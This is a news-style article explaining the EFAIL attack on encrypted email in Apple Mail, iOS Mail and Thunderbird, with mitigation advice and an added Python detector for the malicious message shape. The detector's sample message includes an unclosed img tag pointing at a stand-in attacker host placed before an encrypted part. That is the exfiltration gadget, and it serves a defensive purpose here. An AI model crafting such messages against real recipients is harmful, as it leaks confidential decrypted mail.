Researchers have discovered bugs in the HTML rendering of Apple Mail on Mac and iOS, as well as in Mozilla Thunderbird. These flaws make it possible for attackers to extract the plain text of mail messages that were originally sent encrypted.
Many businesses rely on PGP and S/MIME encrypted email to keep communications confidential.
The main issue affecting Apple Mail, iOS Mail and Mozilla Thunderbird is a technique that uses multipart messages to take advantage of flaws in HTML rendering.
To put it differently: if a hacker gets hold of someone’s encrypted email, they can send that encrypted text back to the user and thereby recover the unencrypted plain text, without ever needing the sender’s confidential encryption keys.
Basically, the hacker would have to send three parts: an encrypted text string, an incomplete HTML tag declaration, and the final HTML to close the image tag.
What happens next is that the mail client decrypts the ciphertext and then renders it as the bogus picture’s source URL.
When the recipient opens the email using their own email client, it will then try to load the URL to open the image. The hacker’s server logs this request, and it then has its own copy of the now unencrypted content. Naturally, the domain forming part of the URL has to be controlled by the hacker to do this, for instance, efail.de.
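As an added example (not from the original article or the researchers), this Python check flags the message shape described above before a message reaches the decrypting client: an HTML part that leaves a URL attribute open, immediately followed by an encrypted part. The function names, the `attacker.example` domain and the placeholder ciphertext are assumptions made up for illustration.

```python
import email
import re
from email import policy

# A tag whose quoted src/href/background value is still open when the part ends.
UNCLOSED_ATTR = re.compile(
    r"""<\w+[^>]*\b(?:src|href|background)\s*=\s*(["'])(?:(?!\1).)*\Z""", re.I | re.S)
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "application/pgp-encrypted", "multipart/encrypted"}

def is_encrypted(part):
    """True for S/MIME and PGP/MIME parts and for inline ASCII-armored PGP."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    return b"-----BEGIN PGP MESSAGE-----" in (part.get_payload(decode=True) or b"")

def find_exfil_gadgets(raw):
    """Return (part_index, open_tag) per HTML part left open before an encrypted sibling."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    hits = []
    for container in msg.walk():
        parts = list(container.iter_parts())  # empty for non-multipart parts
        for i in range(len(parts) - 1):
            if parts[i].get_content_type() != "text/html":
                continue
            m = UNCLOSED_ATTR.search(parts[i].get_content())
            if m and is_encrypted(parts[i + 1]):
                hits.append((i, m.group(0).strip()))
    return hits

# Constructed sample: placeholder ciphertext and a reserved .example domain.
SAMPLE = b"""\
Content-Type: multipart/mixed; boundary="B"

--B
Content-Type: text/html

<img src="http://attacker.example/
--B
Content-Type: application/pkcs7-mime; smime-type=enveloped-data

PLACEHOLDER-CIPHERTEXT
--B
Content-Type: text/html

">
--B--
"""
print(find_exfil_gadgets(SAMPLE))
```

A hit means the message should be quarantined or shown with HTML rendering disabled; a well-formed HTML part followed by an encrypted part produces no hit.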
The only permanent way to resolve this is via a software update, which is undoubtedly in the pipeline. Until then, users can respond by disabling ‘Load remote content in messages’ in Mail Preferences in Apple Mail on Mac. On iOS, the setting is under iOS Settings and is called ‘Load Remote Images’.
You could also try removing the PGP keys from the email client completely, so the app cannot decrypt encoded strings at all.